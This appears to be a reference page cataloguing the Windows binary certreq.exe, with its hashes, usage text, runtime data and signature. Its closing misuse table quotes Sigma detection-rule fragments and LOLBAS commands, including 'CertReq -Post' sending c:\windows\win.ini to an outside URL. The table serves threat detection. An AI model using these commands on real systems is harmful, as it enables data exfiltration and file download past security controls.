certreq.exe

  • File Path: C:\Windows\system32\certreq.exe
  • Description: CertReq.exe

Screenshot

certreq.exe

Hashes

Type Hash
MD5 9E5EA30E8DF2A24833FDB9F2D673C41A
SHA1 F886209FC4A6133663E4A4B0DF90653B41087564
SHA256 F13E81392CF787527EEEFCC6BD0B1941EBCF24ABE6A0AD9741C96A341E4A701E
SHA384 33080C7AD1362F2DFAB4F5F64498BC41A015B19AE3F8EE54BB7C1CFF6D92920FF1BA09FD2DC9C10423B09F8434C3E1EE
SHA512 FEA3285C8A31634A2A3B586A84227E47430CAF40BEB021553C3A42690537C2FD36FF0C5DDAE48694677CD6F27E6D9BFF45EA95E4B61032CF072A8F3BFBBA71EB
SSDEEP 6144:o1jApSZtYMcE8OYESAvz3EmVo1Hg38LkyA5JefQHeVh+BRd2YTibcgkv18NR:o181OYQ73E2IAsrPfftgX
IMP E4057C8BDE1B79AA1724B455F9E7C2BB
PESHA1 E5C48427011B598289A5AB78689988D56C45071B
PE256 94DE13463DF3C7561B9B700AB2137B11950D1ECF8DD4FB58A7E6E0615CF3B905

Runtime Data

Usage (stdout):

Usage:
  CertReq -?
  CertReq [-v] -?
  CertReq [-Command] -?

  CertReq [-Submit] [Options] [RequestFileIn [CertFileOut [CertChainFileOut [FullResponseFileOut]]]]
    Submit a request to a Certification Authority.

  Options:
    -attrib AttributeString
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine
    -RenewOnBehalfOf
    -NoChallenge

  CertReq -Retrieve [Options] RequestId [CertFileOut [CertChainFileOut [FullResponseFileOut]]]
    Retrieve a response to a previous request from a Certification Authority.

  Options:
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine

  CertReq -New [Options] [PolicyFileIn [RequestFileOut]]
    Create a new request as directed by PolicyFileIn

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -user
    -machine
    -xchg ExchangeCertFile

  CertReq -Accept [Options] [CertChainFileIn | FullResponseFileIn | CertFileIn]
    Accept and install a response to a previous new request.

  Options:
    -user 
    -machine 
    -pin Pin

  CertReq -Policy [Options] [RequestFileIn [PolicyFileIn [RequestFileOut [PKCS10FileOut]]]]
    Construct a cross certification or qualified subordination request
    from an existing CA certificate or from an existing request.

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -noEKU
    -AlternateSignatureAlgorithm
    -HashAlgorithm HashAlgorithm

  CertReq -Sign [Options] [RequestFileIn [RequestFileOut]]
    Sign a certificate request with an enrollment agent or qualified
    subordination signing certificate.

  Options:
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -crl
    -noEKU
    -HashAlgorithm HashAlgorithm

  CertReq -Enroll [Options] TemplateName
  CertReq -Enroll -cert CertId [Options] Renew [ReuseKeys]
    Enroll for or renew a certificate.

  Options:
    -PolicyServer PolicyServer
    -user 
    -machine 
    -pin Pin

  CertReq -EnrollAIK [Options] [KeyContainerName]
    Enroll for AIK certificate.

  Options:
    -config

  CertReq -EnrollCredGuardCert [Options] TemplateName [ExtensionInfFile]
    Enroll for machine account Credential Guard certificate.

  Options:
    -config

  CertReq -EnrollLogon [Options]
    Enroll for Hello for Business Logon certificate via ADFS.

  Options:
    -q

  CertReq -Post [Options]
    POST an http request.

  Options:
    -attrib AttributeString
    -config URL

Unknown argument: --help

Child Processes:

conhost.exe

Window Title:

Certificate Request Processor

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\certreq.exe.mui File
(R-D) C:\Windows\System32\en-US\KernelBase.dll.mui File
(RW-) C:\Users\user File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2 Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\1\Windows\Theme449731986 Section
\Windows\Theme1396518710 Section

Loaded Modules:

Path
C:\Windows\system32\certreq.exe
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002EC6579AD1E670890130000000002EC
  • Thumbprint: F7C2F2C96A328C13CDA8CDB57B715BDEA2CBD1D9
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: CertReq.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.19041.1 (WinBuild.160101.0800)
  • Product Version: 10.0.19041.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/f13e81392cf787527eeefcc6bd0b1941ebcf24abe6a0ad9741c96a341e4a701e/detection

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_certreq_download.yml title: Suspicious Certreq Command to Download DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml Image\|endswith: '\certreq.exe' DRL 1.0
LOLBAS Certreq.yml Name: CertReq.exe  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal  
LOLBAS Certreq.yml - Path: C:\Windows\System32\certreq.exe  
LOLBAS Certreq.yml - Path: C:\Windows\SysWOW64\certreq.exe  
LOLBAS Certreq.yml - IOC: certreq creates new files  
LOLBAS Certreq.yml - IOC: certreq makes POST requests  
LOLBAS Certreq.yml - Link: https://dtm.uk/certreq  

MIT License. Copyright (c) 2020-2021 Strontic.